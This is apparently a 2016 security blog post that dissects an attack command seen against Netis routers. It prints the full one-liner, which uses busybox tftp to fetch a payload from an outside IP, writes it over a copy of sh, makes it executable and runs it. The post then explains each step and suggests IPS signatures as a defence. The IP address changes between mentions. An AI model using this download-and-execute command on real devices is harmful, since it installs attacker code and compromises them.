cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 18.104.22.168;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.
So first ...
cd /tmp || cd /var/ || cd /dev/;
The first thing the attacker tries it to move into a directory where he likely has read/write permissions. Thus he uses the double-pipe (||) to so that if the first command fails, the second command is executed, and if that one fails, the third is executed. Thus it's essentially an if this command works do it, otherwise try the next, otherwise try the next. So he sees if he has permission to move into the /tmp folder or the /var folder or the /dev folder. If he moves into any of those folders then he's ready to execute the more interesting commands.
busybox tftp -r min -g 22.214.171.124;
Next the user is taking advantage of busybox, which is a tool that is on many embedded linux devices (likely the Netis Router that is exploitable) and this tool has many basic linux commands/functions such as tftp.
tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
-r FILE Remote FILE
-g Get file
So the attacker is using the tftp command to get a remote file called 'min', in this case from the server at 126.96.36.199 and save it to the current directory (again this could be /tmp, /var, or /dev depending on the first command excecuted).
cp /bin/sh .;
Next the user makes a copy of the shell executable to the current directory (again this could be /tmp, /var, or /dev depending on the first command excecuted).
cat min >sh;
Next the attacker appears to concatenate the contents of the downloaded file to the end of the sh executable, thus when the sh executable is run it will run not only the standard commands but also the ones the attacker appended to it.
chmod 777 sh;
Then the sh permissions are changed so that the attacker is able to execute them.
Finally the attacker executes the sh executable which includes his downloaded payload and your server is likely now compromised.
To prevent this I'm not sure that I've seen anything about Netis actually patching it so you probably need some sort of IPS (Intrusion Prevention System) that has a signature match that can block this type of traffic.
More about neonprimetime
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- DOM XSS 101 Walk-Through
- An Invoice email and a Hot mess of Java
Top Github Contributions
Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.